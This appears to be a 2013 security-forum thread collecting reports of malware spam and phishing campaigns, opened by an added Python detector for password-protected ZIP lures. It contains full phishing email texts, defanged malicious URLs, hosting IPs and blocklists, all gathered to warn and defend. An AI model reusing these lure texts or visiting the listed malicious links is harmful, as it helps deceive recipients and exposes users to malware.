- https://isc.sans.edu/diary.html?storyid=15617
2013-04-16
:fear: :mad:
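The Fiserv spam above works by putting the malware in a password-protected ZIP and printing the password in the message body, so a gateway scanner cannot open the archive while the recipient can. As an added example that is not part of the thread or of the dynamoo post, this Python checks a message for exactly that combination: a ZIP attachment whose encryption flag is set plus a password handed out in the body, and lists any executable member names from the central directory, which stays readable without the password. The sample message is constructed to mirror the quoted lure (placeholder bytes, not malware), and the password phrasing the regex looks for is an assumption based on this one sample.

```python
import email
import io
import re
import zipfile
from email import policy
from email.message import EmailMessage

# Narrow heuristic matching the wording of this lure: "password - KsUs3Z921mA", "password : xyz".
PASSWORD_HINT = re.compile(r"\bpassword\b[^\n]{0,40}?\s[-:]\s*(\S+)", re.IGNORECASE)
EXECUTABLE_EXT = (".exe", ".scr", ".com", ".pif")


def inspect_zip(data):
    """Return (encrypted, executable member names) using only the ZIP central directory."""
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            infos = zf.infolist()
    except zipfile.BadZipFile:
        return False, []
    encrypted = any(info.flag_bits & 0x1 for info in infos)  # bit 0 = member is encrypted
    executables = [i.filename for i in infos if i.filename.lower().endswith(EXECUTABLE_EXT)]
    return encrypted, executables


def assess_message(raw):
    """Flag ZIP attachments that are encrypted while the body hands out the password."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    body = msg.get_body(preferencelist=("plain", "html"))
    text = body.get_content() if body is not None else ""
    hint = PASSWORD_HINT.search(text)
    findings = []
    for part in msg.iter_attachments():
        name = part.get_filename() or ""
        if not name.lower().endswith(".zip"):
            continue
        encrypted, executables = inspect_zip(part.get_payload(decode=True))
        if encrypted and hint is not None:
            findings.append({
                "attachment": name,
                "password_in_body": hint.group(1),
                "executables": executables,
            })
    return findings


def build_sample_email(encrypted=True):
    """Constructed look-alike of the Fiserv spam; the ZIP's encryption bit is set by hand."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_STORED) as zf:
        # Placeholder bytes, not an executable; only the name mirrors the spam.
        zf.writestr("Case_Fiserv_04162013.exe", b"MZ placeholder, not malware")
    data = bytearray(buf.getvalue())
    if encrypted:
        data[6] |= 0x01                   # local file header: general-purpose flag bit 0
        cd = data.find(b"PK\x01\x02")
        data[cd + 8] |= 0x01              # central directory entry: same flag
    msg = EmailMessage()
    msg["From"] = "Fiserv Secure Notification <secure.notificationi@fiservi.com>"
    msg["Subject"] = "[WARNING : MESSAGE ENCRYPTED] Fiserv Secure Email Notification - CC3DK9WJW8IG0F5"
    msg.set_content(
        "You have received a secure message\n"
        "Read your secure message by opening the attachment, Case_CC3DK9WJW8IG0F5.zip.\n"
        "To decrypt the message use the following password - KsUs3Z921mA\n"
        "The message is password-protected, enter your password to open it.\n"
    )
    msg.add_attachment(bytes(data), maintype="application", subtype="zip",
                       filename="Case_CC3DK9WJW8IG0F5.zip")
    return msg.as_bytes()


if __name__ == "__main__":
    for finding in assess_message(build_sample_email()):
        print(finding)
```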
AplusWebMaster
2013-04-17, 15:04
FYI...
Fake Boston Marathon SPAM / askmeaboutcctv .com
- http://blog.dynamoo.com/2013/04/boston-marathon-spam-askmeaboutcctvcom.html
17 April 2013 - "This pretty shameful Boston marathon themed spam leads to malware on askmeaboutcctv .com:
Sample 1:
From: Graham Jarvis [mailto:alejandro.alfonzo-larrain @tctwest .net]
Sent: 17 April 2013 09:49
Subject: Video of Explosion at the Boston Marathon 2013
hxxp:||61.63.123.44/news .html
Sample 2:
From: Sally Rasmussen [mailto:artek33 @risd .edu]
Sent: 17 April 2013 09:49
To: UK HPEA 2
Subject: Aftermath to explosion at Boston Marathon
hxxp:||190.245.177.248/news .html
(Note that the payload links have been lightly obfuscated, don't click them).
If you click the link you see a set of genuine YouTube videos. However, the last one seems blank because it is in fact a malicious IFRAME to [donotclick]askmeaboutcctv .com/wmiq.html (report here*) which appears to be on a legitimate but hacked site. The server seems to be overloaded at the moment which is a good thing I suppose.
* http://urlquery.net/report.php?id=2044081
... RedKit applet + obfuscated URL...
more sample subjects and links:
Subject: Video of Explosion at the Boston Marathon 2013
Subject: Aftermath to explosion at Boston Marathon
Subject: Explosion at Boston Marathon
Subject: Explosions at the Boston Marathon
[donotclick]46.233.4.113 /boston.html
[donotclick]37.229.92.116 /boston.html
[donotclick]188.2.164.112 /news.html
[donotclick]109.87.205.222 /news.html
I would advise blocking these IPs and domains. Be vigilant against this kind of attack, also bear in mind that the bad guys might try to exploit Margaret Thatcher's funeral and the London Marathon in the same way."
- http://blog.dynamoo.com/2013/04/websitewelcomecom-and-boston-marathon.html
17 April 2013 - "Earlier today I reported some Boston Marathon themed spam and since then I have seen more malicious landing pages on -hacked- legitimate sites as follows (don't click those links, obviously):
hxxp :||46.233.4.113 /boston.html
96.125.163.122 (WebsiteWelcome.com, US) ...
hxxp :||190.245.177.248 /news.html
184.172.168.32 (WebsiteWelcome.com, US)...
hxxp :||95.87.6.156 /boston.html
50.22.194.64 (WebsiteWelcome.com, US)...
69.56.174.178 ...
This situation has been reported to HostGator / WebsiteWelcome who are investigating..."
(More detail at the dynamoo URL above.)
Sample screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/d2e8939eba0af8c7e5cc44c43c80f5d1/tumblr_inline_mlegwyVPcg1qz4rgp.png
___
KELIHOS Worm Emerges, Takes Advantage of Boston Marathon Blast
- http://blog.trendmicro.com/trendlabs-security-intelligence/kelihos-worm-emerges-takes-advantage-of-boston-marathon-blast/
April 16, 2013 11:52 pm (UTC-7) - "... a spam outbreak of more than 9,000 Blackhole Exploit Kit spammed messages, all related to the said tragedy that killed at least three people and injured many more. Some of the spammed messages used the subjects “2 Explosions at Boston Marathon,” “Aftermath to explosion at Boston Marathon,” “Boston Explosion Caught on Video,” and “Video of Explosion at the Boston Marathon 2013" to name a few. Below is a spam sample she found:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2013/04/Boston_blast_fig1.png
The spammed message only contains the URL... but once you click it, it displays a web page with an embedded video, supposedly from YouTube. At this point, users who click the link may have already downloaded malware unknowingly, aka drive-by-download attacks. Here’s a screenshot of the web page with the embedded video:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2013/04/Boston_blast_fig2.png
... Aside from the spam sample discussed earlier, we also found that other platforms have also been exploited to spread similar threats. Malicious Tweets and links on free blogging platforms were also crafted just hours after the blast took place.
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2013/04/Boston_blast_fig6.png
... a cybercriminal’s work is never complete. Taking advantage of newsworthy events is indeed a cybercrime staple; each new scheme always seems to vary, which results in a never-ending cycle of malicious mischief."
___
Boston Marathon bombings used to spread malware
- https://www.net-security.org/malware_news.php?id=2469
April 17, 2013 - "... the Boston Marathon bombings have become an effective lure in the hands of cyber scammers and malware peddlers. Kaspersky Lab researchers are warning about spam emails* offering nothing more than a simple link to a web page that contains URLs of non-malicious YouTube videos about the attacks. Unfortunately, after 60 seconds, another link is activated, and this one leads to a malicious executable:
> https://www.net-security.org/images/articles/boston-exe-17042013.jpg
The file offered for download is a variant of the Tepfer info-stealer Trojan, which phones home to a number of IP addresses in Ukraine, Argentina and Taiwan... don't follow links or download files delivered via unsolicited emails or messages sent via popular social media sites and IM services. Your best bet is to check out reputable news sites for information."
* https://www.securelist.com/en/blog/208194228/Boston_Aftermath
___
Fake BBB SPAM / janariamko .ru
- http://blog.dynamoo.com/2013/04/bbb-spam-janariamkoru.html
17 Apr 2013 - "After a few quiet days on the RU:8080 spam front it has started again..
Date: Wed, 17 Apr 2013 20:18:14 +0800
From: "Better Business Bureau" [guttersnipeg792 @ema1lsv100249121 .bbb.org]
Subject: Better Business Beareau accreditation Terminated 64A488W04
Case N. 64A488W04
Respective Owner/Responsive Person:
The Better Business Bureau has been filed the above said reclamation from one of your clients with reference to their business relations with you. The information about the consumer's trouble are available at the link below. Please give attention to this matter and communicate with us about your opinion as soon as possible.
We graciously ask you to visit the COMPLAINT REPORT to respond on this reclamation. Click here to be taken directly to your report today:
bbb .org/business-claims/customercare/report-65896564
If you think you got this email by mistake - please forward this message to your principal or accountant
We are looking forward to your prompt answer.
Looking for info on additional ways your BBB Accreditation can boost your business? Visit the BBB SmartGuide.
Sincerely,
Gabriel Reyes - Online Communication Specialist
bbb.org - Start With Trust
The malicious payload is at [donotclick]janariamko.ru:8080/forum/links/public_version.php (report here*) hosted on the following IPs:
91.191.170.26 (Netdirekt, Turkey)
93.187.200.250 (Netdirekt, Turkey)
208.94.108.238 (Fibrenoire, Canada)
Blocklist:
91.191.170.26
93.187.200.250
208.94.108.238 ..."
* http://urlquery.net/report.php?id=2048054
... Blackholev2 redirection successful 93.187.200.250
___
Another BBB spam run / freedblacks .net
- http://blog.dynamoo.com/2013/04/bbb-spam-freedblacksnet.html
17 Apr 2013 - "Another BBB spam run today, although this time not an RU:8080 spam we saw earlier but an "Amerika" spam run instead. Interestingly, both mis-spell "Beareau" which indicates they are using the same software, even if they are different gangs. The link in the email leads to malware on freedblacks .net.
Date: Wed, 17 Apr 2013 21:20:20 +0800 [09:20:20 EDT]
From: BBB [bridegroomc @m.bbb .org]
Subject: Better Business Beareau accreditation Cancelled P5088819
Case No. P5088819
Respective Owner/Responsive Person:
The Better Business Bureau has been registered the above said claim letter from one of your users as regards their business contacts with you. The information about the consumer's worry are available for review at a link below. Please pay attention to this issue and inform us about your sight as soon as possible.
We amiably ask you to click and review the APPEAL REPORT to respond on this claim letter. Click here to be taken directly to your report today:
bbb .org/business-claims/customercare/report-02111671
If you think you recieved this email by mistake - please forward this message to your principal or accountant
We are looking forward to your prompt answer.
Looking for info on additional ways your BBB Accreditation can boost your business? Visit the BBB SmartGuide.
Sincerely,
Ian Wilson - Online Communication Specialist
bbb.org - Start With Trust
The link goes to a legitimate hacked site and then to a malicious landing page at [donotclick]freedblacks.net/news/agency_row_fixed.php (report here*) hosted on the following IPs:
65.34.160.10 (Comcast, US)
94.249.206.117 (GHOSTnet, Germany)
155.239.247.247 (Centurion Telkom, South Africa)
173.234.239.60 (Nobis Technology Group, US)
Blocklist:
65.34.160.10
94.249.206.117
155.239.247.247
173.234.239.60 ..."
* http://wepawet.iseclab.org/view.php?hash=ca4533c1d2bc83e5f065e0f11920e277&t=1366206729&type=js
___
Fake CNN .com Boston Marathon SPAM / thesecondincomee .com
- http://blog.dynamoo.com/2013/04/cnncom-boston-marathon-spam.html
17 Apr 2013 - "This Boston Marathon themed spam leads to malware on thesecondincomee .com:
Example 1:
Date: Wed, 17 Apr 2013 10:32:18 -0600 [12:32:18 EDT]
From: CNN Breaking News [BreakingNews@mail.cnn.com]
Subject: Opinion: Boston Marathon Explosions - Obama Benefits? - CNN.com
CNN.com
Powered by
* Please note, the sender's email address has not been verified.
You have received the following link from BreakingNews @mail .cnn .com:
Click the following to access the sent link:
Boston Marathon Explosions - Obama Benefits? - CNN.com*
SAVE THIS link FORWARD THIS link
Get your EMAIL THIS Browser Button and use it to email content from any Web site. Click here for more information.
*This article can also be accessed if you copy and paste the entire address below into your web browser.
by clicking here
Example 2:
Date: Wed, 17 Apr 2013 22:32:56 +0600
From: behring401 @mail .cnn .com
Subject: Opinion: Boston Marathon Explosions - North Korea trail or Osama Legacy? - CNN.com
Powered by
* Please note, the sender's email address has not been verified.
You have received the following link from BreakingNews @mail .cnn .com:
Click the following to access the sent link:
Boston Marathon Explosions - North Korea trail or Osama Legacy? - CNN.com*
Get your EMAIL THIS Browser Button and use it to email content from any Web site. Click here for more information.
This article can also be accessed if you copy and paste the entire address below into your web browser.
by clicking here
Screenshot: https://lh3.ggpht.com/-ZWq-ThYXI-U/UW7wV9Gnq6I/AAAAAAAABFU/51KST-M9iLs/s400/cnn-boston.png
The malicious payload is at [donotclick]thesecondincomee .com/news/agency_row_fixed.php hosted on:
94.249.206.117 (GHOSTnet, Germany)
155.239.247.247 (Centurion Telkom, South Africa)
173.234.239.60 (Nobis Technology Group, US)
The recommended blocklist is the same as used in this earlier attack*."
* http://blog.dynamoo.com/2013/04/bbb-spam-freedblacksnet.html
:mad: :mad:
AplusWebMaster
2013-04-18, 16:57
FYI...
Malicious Texas Explosion SPAM
- http://blog.dynamoo.com/2013/04/fertilizer-plant-explosion-near-waco.html
18 April 2013 - "As I suspected, this didn't take long. This spam is a retread of yesterday's Boston Marathon spam.
From: Maria Numbers [mailto:tjm7 @deco-club .ru]
Sent: 18 April 2013 11:51
To: UK HPEA 3
Subject: CAUGHT ON CAMERA: Fertilizer Plant Explosion Near Waco, Texas
hxxp :||83.170.192.154 /news.html
At the moment the payload site is [donotclick]bigmovies777 .sweans .org/aoiq.html (report here* but site appears b0rked) but it seems to rotate every hour or so to a new domain. Almost all the domains I have seen are -hacked- legitimate sites hosted by WebsiteWelcome. If you click through you get five genuine embedded YouTube videos plus a malware IFRAME that looks a bit like this:
> https://lh3.ggpht.com/-9WKYbkNtVV4/UW_cpX_dQYI/AAAAAAAABFk/SBWXy4vsUHk/s400/texas-explosion.jpg
The Boston Marathon spam led to a RedKit exploit kit, this probably does too. Given the ever-changing nature of the malware landing page, this one is rather difficult to stop. Advising your user population of the risk may be prudent.
Sample subjects:
CAUGHT ON CAMERA: Fertilizer Plant Explosion
CAUGHT ON CAMERA: Fertilizer Plant Explosion Near Waco, Texas
Raw: Texas Explosion Injures Dozens
Texas Explosion Injures Dozens..."
* http://urlquery.net/report.php?id=2061326
___
Malicious West, TX Exploison Spam
- http://threattrack.tumblr.com/post/48274886150/malicious-west-tx-exploison-spam
18 April 2013 - "Subjects Seen:
West Tx Explosion
Video footage of Texas explosion
Typical e-mail details:
182.235.147.164 /texas.html
Malicious URLs
182.235.147.164 /texas.html
78.90.133.133 /news.html
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/f117098a739d2942bebddd798b2d3fb8/tumblr_inline_mlgc8tbBze1qz4rgp.png
___
Malicious Secure Message Spam
- http://threattrack.tumblr.com/post/48292544114/malicious-secure-message-spam
18 April 2013 - "Subjects Seen:
New Secure Message Received from [removed]
Typical e-mail details:
Greetings [removed],
You have received a new secure message from [removed].
If you are using the Secure Message Plugin in Outlook Messamnger this message will be in your SecureMSG Folder.
If you are NOT using the Secure Message Plugin, you are able to view it at csiweb.com/[removed] to retrieve your secure message or to begin using the convenient Lotus Notes Plugin.
Thank You,
CSIeSafe
Malicious URLs
klamzi .hu/csisecurmsg.html?id=8757234110
sub.newwaysys .com/complaints/rush-lacked_whereby.php
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/2d45deaff138af0855d389832f33dc91/tumblr_inline_mlgsinLRZF1qz4rgp.png
___
Texas and Boston Blasts SPAM
- http://www.hotforsecurity.com/blog/shock-waves-from-texas-and-boston-blasts-hit-internet-in-form-of-spam-waves-5973.html
April 18, 2013 - "The blasts that killed 15 people and injured 160 at a Texas fertilizer plant yesterday triggered a global wave of malicious spam today, even as the internet is still infested with spam messages that exploit the Boston Marathon bombings to spread password-stealing malware... based on a sample pool of 2 million unsolicited e-mails, turned up hundreds of thousands of spam messages that had been altered at the last minute to promise breaking news, graphic videos and more related to the Boston Marathon attacks. In the spam wave, Bitdefender found spam harboring a component of the infamous Red Kit exploit pack. Threats downloaded by RedKit include Trojan.GenericKDZ.14575, a password stealer that grabs users’ account passwords. It also watches the network traffic of the infected machine by dropping three legitimate WinPcap components, some of which were reported to also steal bitcoin wallets and send e-mails. The same criminal group that launched the Boston spam has apparently changed the subject tag line to read: Fertilizer Plant Explosion Near Waco, Texas, Texas Explosion Injures Dozens, West Tx Explosion, Raw: Texas Explosion Injures Dozens, Caught on Camera: fertilizer Plant Explosion Near Waco, Texas. They replaced the ending of the malicious URL with “texas.html” but kept the e-mail format, the compromised domains, the modus operandi, and the RedKit.
Screenshot1: http://www.hotforsecurity.com/wp-content/uploads/2013/04/Shock-Waves-from-Texas-and-Boston-Blasts-Hit-Internet-in-Form-of-Spam-Waves_1.png
... Users who click the URLs land on a website displaying YouTube videos on the Texas plant blast while, in the background, a component of RedKit downloads malicious software.
Screenshot2: http://www.hotforsecurity.com/wp-content/uploads/2013/04/Shock-Waves-from-Texas-and-Boston-Blasts-Hit-Internet-in-Form-of-Spam-Waves2.png
... be cautious and avoid opening e-mails promising exclusive videos about the blast – and never click on the included links..."
___
- http://tools.cisco.com/security/center/threatOutbreak.x?i=77
Fake ADP Payroll Invoice Notification E-mail Messages - 2013 Apr 18
Fake Digital Certificate Notification E-mail Messages - 2013 Apr 18
Fake Lawsuit Documents Attachment E-mail Messages - 2013 Apr 18
Fake PayPal Notification E-mail Messages - 2013 Apr 18
Fake Payment Request Notice E-mail Messages on Messages - 2013 Apr 18
Fake Tax Document Submission Notification E-mail Messages - 2013 Apr 18
Malicious Attachment E-mail Messages - 2013 Apr 18
Scanned Document Attachment E-mail Messages - 2013 Apr 18
(Links and more detail available at the cisco URL above.)
:mad::fear:
AplusWebMaster
2013-04-19, 14:19
FYI...
Fake Facebook scam leads to Fake Flash Player...
- http://blog.trendmicro.com/trendlabs-security-intelligence/fake-page-with-90-million-likes-leads-to-fake-adobe-flash/
April 19, 2013 - "Besides the fake Facebook Profile Viewer ruse, we found another Facebook scam that lures users into downloading a fake Adobe Flash Player plugin. We noticed countless feeds pointing to a Facebook page with more than 90 million “likes”. For some, this huge number of Facebook likes may be enough for them to check the page out. It also means that the page is quite popular and may lead users into thinking that it is legitimate and harmless.
> https://blog.trendmicro.com/trendlabs-security-intelligence/files/2013/04/newfacebookprofile.png
... we verified that this 91 million Likes is not true at all and is merely a social engineering lure. Once users visit the page, they are instead led to this site:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2013/04/fake-Facebook-page.jpg
From the looks of it, the page is supposed to host an Adobe Flash Player plugin (detected as TROJ_FAKEADB.US). If the user downloads the plugin and is browsing the page via Google Chrome, the page will automatically close and a Chrome extension file is dropped. This extension file is detected as TROJ_EXTADB.US. Once installed, the malware will spam the same post using the affected user’s account (even tagging their friends in the message.) Also, TROJ_EXTADB.US was found to send and receive information from certain URLs... cybercriminals and other bad guys out there are using the platform to launch their schemes. From threats that may steal your credit card information to garden-variety scams, users must always be careful with their social media accounts. Always be wary when clicking links, even if they are from your contacts or friends..."
___
Fake American Express SPAM / CD0199381.434469398992.zip
- http://blog.dynamoo.com/2013/04/american-express-spam.html
19 Apr 2013 - "This fake American Express spam comes with a malicious attachment:
Date: Fri, 19 Apr 2013 08:29:52 -0500 [09:29:52 EDT]
From: "PAYVESUPPORT @AEXP .COM" [PAYVESUPPORT @AEXP .COM]
Subject: PAYVE - Remit file
Part(s): 2 CD0199381.434469398992.zip [application/zip]
A payment(s) to your company has been processed through the American Express Payment
Network.
The remittance details for the payment(s) are attached (CD0199381.434469398992.zip).
- The remittance file contains invoice information passed by your buyer. Please
contact your buyer
for additional information not available in the file.
- The funds associated with this payment will be deposited into your bank account
according to the
terms of your American Express merchant agreement and may be combined with other
American Express deposits.
For additional information about Deposits, Fees, or your American Express merchant
agreement:
Contact American Express Merchant Services at 1-800-528-8782 Monday to Friday,
8:00 AM to 8:00 PM ET. - You can also view PAYVE payment and invoice level details
using My Merchant Account/Online Merchant Services.
If you are not enrolled in My Merchant Account/OMS, you can do so at
www.americanexpress.com/mymerchantaccount
or call us at 1-866-220-6634, Monday - Friday between 9:00 AM-7:30 PM ET, and we'll
be glad to help you.
For quick and easy enrollment, please have your American Express Merchant Number,
bank account ABA (routing number)
and DDA (account number) on hand.
This customer service e-mail was sent to you by American Express. You may receive
customer service e-mails even if you have unsubscribed from marketing e-mails from
American Express.
Copyright 2013 American Express Company...
There is an attachment CD0199381.434469398992.zip containing a file CD0199381-04192013.exe [note the date is encoded in the file]. VirusTotal results for that file are just 6/46*. ThreatExpert reports** that the malware communicates with the following servers:
mail.yaklasim .com (212.58.4.13: Doruknet, Turkey)
autoservicegreeley .com (198.100.45.44: A2 Hosting, US)
This malware shares some characteristics with this attack***.
Blocklist:
198.100.45.44
212.58.4.13 ..."
* https://www.virustotal.com/en/file/a08469876f57cbf0febe29df4bff1a6d84665a2162da8d0c60f69a9fd3c290f2/analysis/1366379362/
File name: CD0199381-04192013.exe
Detection ratio: 6/46
Analysis date: 2013-04-19
** http://www.threatexpert.com/report.aspx?md5=b10393be747143f3b4622e9e5277ffce
*** http://blog.dynamoo.com/2013/04/fiserv-secure-email-notification-spam.html
:fear: :mad:
AplusWebMaster
2013-04-22, 14:58
FYI...
Twitter malware...
- https://www.trusteer.com/blog/twitter-malware-spreading-more-than-just-ideas
April 22, 2013 - "... With 288 million active users, Twitter is the world's fourth-largest social network. So it’s no surprise that Twitter is also being used for spreading malware... recently identified an active configuration of TorRAT targeting Twitter users. The malware launches a Man-in-the-Browser (MitB) attack through the browser of infected PCs, gaining access to the victim’s Twitter account to create malicious tweets. The malware, which has been used as a financial malware to gain access to user credentials and target their financial transactions, now has a new goal: to spread malware using the online social networking service. At this time the attack is targeting the Dutch market. However, because Twitter is used by millions of users around the world, this type of attack can be used to target any market and any industry. The attack is carried out by injecting Javascript code into the victim’s Twitter account page. The malware collects the user’s authentication token, which enables it to make authorized calls to Twitter's APIs, and then posts new, malicious tweets on behalf of the victim... This attack is particularly difficult to defend against because it uses a new sophisticated approach to spear-phishing. Twitter users follow accounts that they trust. Because the malware creates malicious tweets and sends them through a compromised account of a trusted person or organization being followed, the tweets seem to be genuine. The fact that the tweets include shortened URLs is not concerning: Twitter limits the number of characters in a message, so followers expect to get interesting news bits in the form of a short text message followed by a shortened URL. However, a shortened URL can be used to disguise the underlying URL address, so that followers have no way of knowing if the link is suspicious... it is quite possible that these URLs lead to malicious webpages.
If so, when the browser renders the webpage’s content an exploit can silently download the malware to the user’s endpoint (a drive-by download)..."
___
Malicious DHL Spam
- http://threattrack.tumblr.com/post/48618555199/malicious-dhl-spam
April 22, 2013 - "Subjects Seen:
Tracking Info
Shipping Detail
Order Detail
Typical e-mail details:
DHL Ship Shipment Notification
On April 18, 2013 a shipment label was printed for delivery.
The shipment number of this package is 81395268.
To get additional info about this shipment use any of these options:
1) Click the following URL in your browser:
2) Enter the shipment number on tracking page:
Tracking Page
For further assistance, please call DHL Customer Service.
For International Customer Service, please use official DHL site.
Malicious URLs
honoredstudents .org/images/index.php?info=841_139088422
eumpharma .com/images/index.php?get_info=ss00_323
sman4-tanjungpinang.sch .id/images/index.php?get_info=ss00_323
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/064f8686a3a0e3222ecdb095279d869c/tumblr_inline_mlo00fl9FL1qz4rgp.png
___
Malware sites to block 22/4/13
- http://blog.dynamoo.com/2013/04/malware-sites-to-block-22413.html
22 April 2013 - "These domains form part of a large Kelihos botnet described over at Malware Must Die* and which is related to the recent Boston Marathon** and Texas Fertilizer Plant spam*** runs. There are probably thousands of IP addresses, but so far I have identified just 76 domains that seem to be active (there are a large number of subdomains). Monitoring for these may reveal Kelihos activity on your network..."
(Long list at the dynamoo URL above.)
* http://malwaremustdie.blogspot.co.uk/2013/04/kelihos-via-redkit-infection-following.html
** http://blog.dynamoo.com/2013/04/boston-marathon-spam-askmeaboutcctvcom.html
*** http://blog.dynamoo.com/2013/04/fertilizer-plant-explosion-near-waco.html
___
Telstra Bill Account Update Phishing Scam
- http://www.hoax-slayer.com/telstra-phishing-scam.shtml
April 22, 2013 - "... Detailed Analysis: This email, which purports to be from Australian telecommunications giant, Telstra, informs the recipient that the company was unable to process a recent bill payment. The email claims that, unless the account holder follows a link in the message to confirm and update billing information, his or her Telstra service may be interrupted. The email arrives complete with the Telstra logo and a seemingly genuine Telstra sender address. However, the email is certainly -not- from Telstra and the information about a payment problem is a lie. In reality, the email is a phishing scam designed to trick Telstra customers into handing over their personal and financial information to Internet criminals. The link in the phishing scam email is disguised to make it appear that it leads to the genuine Telstra site. The sender address of the email is also disguised in such a way that it appears to have originated from Telstra... Telstra (or BigPond) will -never- send customers unsolicited emails* requesting them to provide financial and personal information via links in the message..."
* https://help.telstra.com/app/answers/detail/a_id/17020
___
Fake "Loss Avoidance Alerts" SPAM / tempandhost .com
- http://blog.dynamoo.com/2013/04/loss-avoidance-alerts-spam.html
22 April 2013 - "I haven't seen this particular spam before. It leads to malware on tempandhost .com:
Date: Tue, 23 Apr 2013 05:41:32 +0900 [16:41:32 EDT]
From: personableop641 @swacha .org
Subject: 4/22/13 The Loss Avoidance Alerts that you requested are now available on the internet
Loss Avoidance Alert System
April 22, 2013
Loss Avoidance Report:
The Loss Avoidance Alerts that was processed are now available on a secure website at:
www .lossavoidancealert .org
http ://www.lossavoidancealert .org
Alerts:
CL0017279 – Sham Checks (ALL)
Note: If the Alert Number does not appear on the Home Page - just go to the top left Search Box,
enter the Alert Number and hit Go.
Thank you for your participation!
Loss Avoidance Alert System Administrator
This email is confidential and intended for the use of the individual to whom it is addressed. Any views or opinions presented are solely
those of the author and do not necessarily represent those of SWACHA-The Electronic Payments Resource. SWACHA will not be held
responsible for the information contained in this email if it is not used for its original intent. Before taking action on any information contained in this email, please consult legal counsel. If you are not the intended recipient, be advised that you have received this email in error and that any use, dissemination, forwarding, printing or copying of this email is strictly prohibited.
If you received this email in error, please contact the sender.
Screenshot: https://lh3.ggpht.com/-bvBZl6q9rNY/UXWvA3TXoiI/AAAAAAAABGI/1YZi4Wytj20/s1600/loss-avoidance-alert.png
The link in the email appears to point to www .lossavoidancealert .org but actually goes through a legitimate -hacked- site (in this case [donotclick]samadaan .com/wp-content/plugins/akismet/swacha.html) to a landing page of [donotclick]tempandhost .com/news/done-heavy_hall_meant.php or [donotclick]tempandhost.com/news/done-meant.php (sample report here* and here**) which is.. err.. some sort of exploit kit or other. It doesn't seem to be responding well to analysis tools, which could either indicate overloading or some trickery, most likely something very like this***. Anyway, tempandhost .com is hosted on the following servers:
1.235.183.241 (SK Broadband Co Ltd, Korea)
46.183.147.116 (Serverclub.com, Netherlands)
155.239.247.247 (Centurion Telkom, South Africa)
202.31.139.173 (Kum oh National University of Technology, Korea) ...
Blocklist:
1.235.183.241
46.183.147.116
155.239.247.247
202.31.139.173 ..."
* http://wepawet.iseclab.org/view.php?hash=6ec41b85c491c9861df7a7af1a889e15&t=1366666636&type=js
** http://jsunpack.jeek.org/?report=1389949d2b3b67f33871cbe7c001b8fb3caafe11
*** http://urlquery.net/report.php?id=2111319
:mad:
AplusWebMaster
2013-04-23, 15:39
FYI...
Fake DHL SPAM / DHL-LABEL-ID-2456-8344-5362-5466.zip
- http://blog.dynamoo.com/2013/04/dhl-spam-dhl-label-id-2456-8344-5362.html
23 Apr 2013 - "This fake DHL spam has a malicious attachment.
Date: Tue, 23 Apr 2013 12:21:40 +0800 [00:21:40 EDT]
From: Ramon Brewer - DHL regional manager [reports @dhl .com]
Subject: DHL DELIVERY REPORT NY73377
DHL notification
Our company’s courier couldn’t make the delivery of parcel.
REASON: Postal code contains an error.
LOCATION OF YOUR PARCEL: New York
DELIVERY STATUS: sort order
SERVICE: One-day Shipping
NUMBER OF YOUR PARCEL: ETBAKPRSU3
FEATURES: No
Label is enclosed to the letter.
Print a label and show it at your post office.
An additional information:
If the parcel isn’t received within 15 working days our company will have the right to claim compensation from you for it’s keeping in the amount of $8.26 for each day of keeping of it.
You can find the information about the procedure and conditions of parcels keeping in the nearest office.
Thank you for using our services.
DHL Global ...
Screenshot: https://lh3.ggpht.com/-ETQLGLo29qk/UXZBAkkkO0I/AAAAAAAABGY/fHdwXwutmOY/s1600/dhl2.png
Attached is a ZIP file called DHL-LABEL-ID-2456-8344-5362-5466.zip which contains an executable DHL-LABEL-ID-2456-8344-5362-5466.exe. VirusTotal detections are patchy at 22/45*..."
(More detail at the dynamoo URL above.)
* https://www.virustotal.com/en/file/bb60e72387030c957226e173de173a97241dec0a46c1d4aa3194ecd0257d185b/analysis/1366703919/
File name: DHL-LABEL-ID-2456-8344-5362-5466.exe
Detection ratio: 22/45
Analysis date: 2013-04-23
> http://camas.comodo.com/cgi-bin/submit?file=bb60e72387030c957226e173de173a97241dec0a46c1d4aa3194ecd0257d185b
___
Something evil on 173.246.104.104
- http://blog.dynamoo.com/2013/04/something-evil-on-173246104104.html
23 April 2013 - "173.246.104.104 (Gandi, US) popped up on my radar after a malvertising attack apparently utilising a hacked OpenX server (I'm not 100% sure which one so I won't name names) and leading to a payload on [donotclick]laserlipoplasticsurgeon .com/news/pint_excluded.php (report here*).
Both VirusTotal** and URLquery* detect multiple malicious domains on this IP. It appears that the domains were originally legitimate, but it looks like they have been hijacked by the bad guys somehow... I recommend that you apply the following blocklist for the time being:
173.246.104.104
(More listed at the dynamoo URL above.)
* http://urlquery.net/report.php?id=2122697
... Detected live BlackHole v2.0 exploit kit 173.246.104.104
- https://www.google.com/safebrowsing/diagnostic?site=AS:29169
** https://www.virustotal.com/en/ip-address/173.246.104.104/information/
___
Fake CareerBuilder SPAM / CB_Offer_04232013_8817391.zip
- http://blog.dynamoo.com/2013/04/careerbuilder-notification-spam.html
23 Apr 2013 - "This fake CareerBuilder email has a malicious attachment containing malware.
Date: Tue, 23 Apr 2013 11:13:54 -0700 [14:13:54 EDT]
From: CareerBuilder [Herman_Gallagher @careerbuilder .com]
Subject: CareerBuilder Notification
Hello,
I am a customer service employee at CareerBuilder. I found a vacant position that you may be interested in based on information from your resume or a recent online submission you made on our site.
You can review the position on the CareerBuilder by downloading the attached PDF file.
Attached file is scanned in PDF format.
Adobe(R)Reader(R) can be downloaded from the following URL: http ://www.adobe .com
Best wishes in your job search !
Hal_Shields
Careerbuilder Customer Service Team
CareerBuilder ,5550-A Peachtree Parkway , Norcross, GA 30092
